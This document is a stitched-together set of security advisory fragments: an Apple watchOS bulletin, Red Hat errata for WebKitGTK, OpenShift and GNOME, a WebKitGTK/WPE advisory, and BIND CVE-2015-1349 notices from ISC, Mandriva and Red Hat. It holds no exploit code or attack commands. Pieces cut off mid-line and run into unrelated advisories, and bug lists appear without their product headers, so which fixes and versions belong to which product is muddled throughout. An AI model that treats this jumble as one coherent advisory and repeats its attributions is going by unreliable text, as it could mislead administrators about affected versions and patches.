Impact: Processing a maliciously contact may lead to UI spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)
File System Events
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero
Day Initiative
Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure
Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8750: found by OSS-Fuzz
VoiceOver
Available for: Apple Watch Series 1 and later
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.
CFNetwork
We would like to acknowledge Lily Chen of Google for their
assistance.
Safari
We would like to acknowledge Ron Summers for their assistance.
WebKit
We would like to acknowledge Zhiyi Zhang of Codesafe Team of
Legendsec at Qi'anxin Group for their assistance.
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About".
Bug Fix(es):
* Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)
* The compliancesuite object returns error with ocp4-cis tailored profile
(BZ#1902251)
* The compliancesuite does not trigger when there are multiple rhcos4
profiles added in scansettingbinding object (BZ#1902634)
* [OCP v46] Not all remediations get applied through machineConfig although
the status of all rules shows Applied in ComplianceRemediations object
(BZ#1907414)
* The profile parser pod deployment and associated profiles should get
removed after upgrade the compliance operator (BZ#1908991)
* Applying the "rhcos4-moderate" compliance profile leads to Ignition error
"something else exists at that path" (BZ#1909081)
* [OCP v46] Always update the default profilebundles on Compliance operator
startup (BZ#1909122)
3. Bugs fixed (https://bugzilla.redhat.com/):
1899479 - Aggregator pod tries to parse ConfigMaps without results
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902251 - The compliancesuite object returns error with ocp4-cis tailored profile
1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object
1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object
1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator
1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path"
1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup
5. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
3. Description:
WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+
platform. These packages provide WebKitGTK+ for GTK+ 3.
The following packages have been upgraded to a later upstream version:
webkitgtk4 (2.28.2). (BZ#1817144)
Security Fix(es):
* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251,
CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544,
CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571,
CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594,
CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,
CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644,
CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,
CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677,
CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683,
CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689,
CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720,
CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763,
CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769,
CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816,
CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823,
CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862,
CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885,
CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900,
CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 7.9 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
ppc64:
webkitgtk4-2.28.2-2.el7.ppc.rpm
webkitgtk4-2.28.2-2.el7.ppc64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64.rpm
ppc64le:
webkitgtk4-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64le.rpm
s390x:
webkitgtk4-2.28.2-2.el7.s390.rpm
webkitgtk4-2.28.2-2.el7.s390x.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390x.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
ppc64:
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64.rpm
s390x:
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-devel-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. ------------------------------------------------------------------------
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0006
------------------------------------------------------------------------
Date reported : November 08, 2019
Advisory ID : WSA-2019-0006
WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0006.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0006.html
CVE identifiers : CVE-2019-8710, CVE-2019-8743, CVE-2019-8764,
CVE-2019-8765, CVE-2019-8766, CVE-2019-8782,
CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
CVE-2019-8812, CVE-2019-8813, CVE-2019-8814,
CVE-2019-8815, CVE-2019-8816, CVE-2019-8819,
CVE-2019-8820, CVE-2019-8821, CVE-2019-8822,
CVE-2019-8823.
Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.
CVE-2019-8710
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to found by OSS-Fuzz.
CVE-2019-8743
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to zhunki from Codesafe Team of Legendsec at Qi'anxin Group.
CVE-2019-8764
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to Sergei Glazunov of Google Project Zero.
CVE-2019-8765
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Samuel Groß of Google Project Zero.
CVE-2019-8766
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to found by OSS-Fuzz.
CVE-2019-8782
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to Cheolung Lee of LINE+ Security Team.
CVE-2019-8783
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Cheolung Lee of LINE+ Graylab Security Team.
CVE-2019-8808
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to found by OSS-Fuzz.
CVE-2019-8811
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Soyeon Park of SSLab at Georgia Tech.
CVE-2019-8812
Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before
2.26.2.
Credit to an anonymous researcher.
CVE-2019-8813
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to an anonymous researcher.
CVE-2019-8814
Versions affected: WebKitGTK before 2.26.2 and WPE WebKit before
2.26.2.
Credit to Cheolung Lee of LINE+ Security Team.
CVE-2019-8815
Versions affected: WebKitGTK before 2.26.0 and WPE WebKit before
2.26.0.
Credit to Apple.
CVE-2019-8816
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Soyeon Park of SSLab at Georgia Tech.
CVE-2019-8819
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Cheolung Lee of LINE+ Security Team.
CVE-2019-8820
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Samuel Groß of Google Project Zero.
CVE-2019-8821
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Sergei Glazunov of Google Project Zero.
CVE-2019-8822
Versions affected: WebKitGTK before 2.24.4 and WPE WebKit before
2.24.3.
Credit to Sergei Glazunov of Google Project Zero.
CVE-2019-8823
Versions affected: WebKitGTK before 2.26.1 and WPE WebKit before
2.26.1.
Credit to Sergei Glazunov of Google Project Zero.
We recommend updating to the latest stable versions of WebKitGTK and WPE
WebKit. It is the best way to ensure that you are running safe versions
of WebKit. Please check our websites for information about the latest
stable releases.
Further information about WebKitGTK and WPE WebKit security advisories
can be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.
The WebKitGTK and WPE WebKit team,
November 08, 2019
. Bugs fixed (https://bugzilla.redhat.com/):
1823765 - nfd-workers crash under an ipv6 environment
1838802 - mysql8 connector from operatorhub does not work with metering operator
1838845 - Metering operator can't connect to postgres DB from Operator Hub
1841883 - namespace-persistentvolumeclaim-usage query returns unexpected values
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1868294 - NFD operator does not allow customisation of nfd-worker.conf
1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration
1890672 - NFD is missing a build flag to build correctly
1890741 - path to the CA trust bundle ConfigMap is broken in report operator
1897346 - NFD worker pods not scheduler on a 3 node master/worker cluster
1898373 - Metering operator failing upgrade from 4.4 to 4.6 channel
1900125 - FIPS error while generating RSA private key for CA
1906129 - OCP 4.7: Node Feature Discovery (NFD) Operator in CrashLoopBackOff when deployed from OperatorHub
1908492 - OCP 4.7: Node Feature Discovery (NFD) Operator Custom Resource Definition file in olm-catalog is not in sync with the one in manifests dir leading to failed deployment from OperatorHub
1913837 - The CI and ART 4.7 metering images are not mirrored
1914869 - OCP 4.7 NFD - Operand configuration options for NodeFeatureDiscovery are empty, no supported image for ppc64le
1916010 - olm skip range is set to the wrong range
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1923998 - NFD Operator is failing to update and remains in Replacing state
5. 8) - aarch64, ppc64le, s390x, x86_64
3. Bugs fixed (https://bugzilla.redhat.com/):
1207179 - Select items matching non existing pattern does not unselect already selected
1566027 - can't correctly compute contents size if hidden files are included
1569868 - Browsing samba shares using gvfs is very slow
1652178 - [RFE] perf-tool run on wayland
1656262 - The terminal's character display is unclear on rhel8 guest after installing gnome
1668895 - [RHEL8] Timedlogin Fails when Userlist is Disabled
1692536 - login screen shows after gnome-initial-setup
1706008 - Sound Effect sometimes fails to change to selected option.
1706076 - Automatic suspend for 90 minutes is set for 80 minutes instead.
1715845 - JS ERROR: TypeError: this._workspacesViews[i] is undefined
1719937 - GNOME Extension: Auto-Move-Windows Not Working Properly
1758891 - tracker-devel subpackage missing from el8 repos
1775345 - Rebase xdg-desktop-portal to 1.6
1778579 - Nautilus does not respect umask settings.
1779691 - Rebase xdg-desktop-portal-gtk to 1.6
1794045 - There are two different high contrast versions of desktop icons
1804719 - Update vte291 to 0.52.4
1805929 - RHEL 8.1 gnome-shell-extension errors
1811721 - CVE-2020-10018 webkitgtk: Use-after-free issue in accessibility/AXObjectCache.cpp
1814820 - No checkbox to install updates in the shutdown dialog
1816070 - "search for an application to open this file" dialog broken
1816678 - CVE-2019-8846 webkitgtk: Use after free issue may lead to remote code execution
1816684 - CVE-2019-8835 webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution
1816686 - CVE-2019-8844 webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution
1817143 - Rebase WebKitGTK to 2.28
1820759 - Include IO stall fixes
1820760 - Include IO fixes
1824362 - [BZ] Setting in gnome-tweak-tool Window List will reset upon opening
1827030 - gnome-settings-daemon: subscription notification on CentOS Stream
1829369 - CVE-2020-11793 webkitgtk: use-after-free via crafted web content
1832347 - [Rebase] Rebase pipewire to 0.3.x
1833158 - gdm-related dconf folders and keyfiles are not found in fresh 8.2 install
1837381 - Backport screen cast improvements to 8.3
1837406 - Rebase gnome-remote-desktop to PipeWire 0.3 version
1837413 - Backport changes needed by xdg-desktop-portal-gtk-1.6
1837648 - Vendor.conf should point to https://access.redhat.com/site/solutions/537113
1840080 - Can not control top bar menus via keys in Wayland
1840788 - [flatpak][rhel8] unable to build potrace as dependency
1843486 - Software crash after clicking Updates tab
1844578 - anaconda very rarely crashes at startup with a pygobject traceback
1846191 - usb adapters hotplug crashes gnome-shell
1847051 - JS ERROR: TypeError: area is null
1847061 - File search doesn't work under certain locales
1847062 - gnome-remote-desktop crash on QXL graphics
1847203 - gnome-shell: get_top_visible_window_actor(): gnome-shell killed by SIGSEGV
1853477 - CVE-2020-15503 LibRaw: lack of thumbnail size range check can lead to buffer overflow
1854734 - PipeWire 0.2 should be required by xdg-desktop-portal
1866332 - Remove obsolete libusb-devel dependency
1868260 - [Hyper-V][RHEL8] VM starts GUI failed on Hyper-V 2019/2016, hangs at "Started GNOME Display Manager" - GDM regression issue |
|
var-201502-0366
|
named in ISC BIND 9.7.0 through 9.9.6 before 9.9.6-P2 and 9.10.x before 9.10.1-P2, when DNSSEC validation and the managed-keys feature are enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit, or daemon crash) by triggering an incorrect trust-anchor management scenario in which no key is ready for use. ISC BIND 9 Under certain conditions in the management of trust anchors named Service termination (DoS) Vulnerabilities exist. ISC The advisory states that: CVE-2015-1349: A Problem with Trust Anchor Management Can Cause named to Crash https://kb.isc.org/article/AA-01235/ "BIND servers which are configured to perform DNSSEC validation and which are using managed-keys (which occurs implicitly when using "dnssec-validation auto;" or "dnssec-lookaside auto;") may terminate with an assertion failure when encountering all of the following conditions in a managed trust anchor: *a key which was previously trusted is now flagged as revoked; *there are no other trusted keys available; *there is a standby key, but it is not trusted yet This situation results in termination of the named process and denial of service to clients, and can occur in two circumstances: *during an improperly-managed key rollover for one of the managed trust anchors (e.g., during a botched root key rollover), or *when deliberately triggered by an attacker, under specific and limited circumstances. ISC has demonstrated a proof-of-concept of this attack; however, the complexity of the attack is very high unless the attacker has a specific network relationship to the BIND server which is targeted"Service disruption by a remote third party (DoS) There is a possibility of being attacked. ISC BIND is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users. This issue affects configurations with the
directives "dnssec-lookaside auto\;" (as enabled in the Mageia default
configuration) or "dnssec-validation auto\;" (CVE-2015-1349).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1349
http://advisories.mageia.org/MGASA-2015-0082.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 1/X86_64:
87d17f8944dfd07774598f951a5e342b mbs1/x86_64/bind-9.9.6.P2-1.mbs1.x86_64.rpm
7cc5d1caba2e2ee6f1a7ed34f57d5734 mbs1/x86_64/bind-devel-9.9.6.P2-1.mbs1.x86_64.rpm
3c58166143183223d74e5213ca5feb1b mbs1/x86_64/bind-doc-9.9.6.P2-1.mbs1.noarch.rpm
22a57fbda0364ea2a8b623c3958d80da mbs1/x86_64/bind-sdb-9.9.6.P2-1.mbs1.x86_64.rpm
14e2df9a464db7af7da97c7ab3fe866d mbs1/x86_64/bind-utils-9.9.6.P2-1.mbs1.x86_64.rpm
eb0a296b13c026ae8bdbcf8d2a9199ae mbs1/SRPMS/bind-9.9.6.P2-1.mbs1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: bind security update
Advisory ID: RHSA-2015:0672-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0672.html
Issue date: 2015-03-10
CVE Names: CVE-2015-1349
=====================================================================
1. Summary:
Updated bind packages that fix one security issue are now available for Red
Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver
library (routines for applications to use when interfacing with DNS); and
tools for verifying that the DNS server is operating correctly.
A flaw was found in the way BIND handled trust anchor management. (CVE-2015-1349)
Red Hat would like to thank ISC for reporting this issue.
All bind users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. After installing the
update, the BIND daemon (named) will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
bind-9.8.2-0.30.rc1.el6_6.2.src.rpm
i386:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.i686.rpm
x86_64:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
bind-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.i686.rpm
x86_64:
bind-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
bind-9.8.2-0.30.rc1.el6_6.2.src.rpm
x86_64:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
bind-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
bind-9.8.2-0.30.rc1.el6_6.2.src.rpm
i386:
bind-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.i686.rpm
ppc64:
bind-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.ppc.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.ppc.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
s390x:
bind-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.s390.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.s390.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
x86_64:
bind-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-chroot-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-libs-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-utils-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.i686.rpm
ppc64:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.ppc.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.ppc.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.ppc64.rpm
s390x:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.s390.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.s390.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.s390x.rpm
x86_64:
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-debuginfo-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.i686.rpm
bind-devel-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
bind-sdb-9.8.2-0.30.rc1.el6_6.2.x86_64.rpm
